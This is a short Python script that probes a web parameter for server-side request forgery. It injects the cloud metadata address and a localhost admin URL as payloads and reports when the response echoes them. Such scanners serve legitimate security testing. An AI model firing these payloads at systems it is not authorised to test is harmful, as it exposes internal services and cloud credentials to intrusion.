import requests
def test_ssrf(url, param):
test_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://localhost/admin"
]
for test in test_urls:
try:
r = requests.get(url, params={param: test}, timeout=5)
if test.split('/')[2] in r.text:
print(f"可能的SSRF漏洞: {param}参数可访问{test}")
except:
continue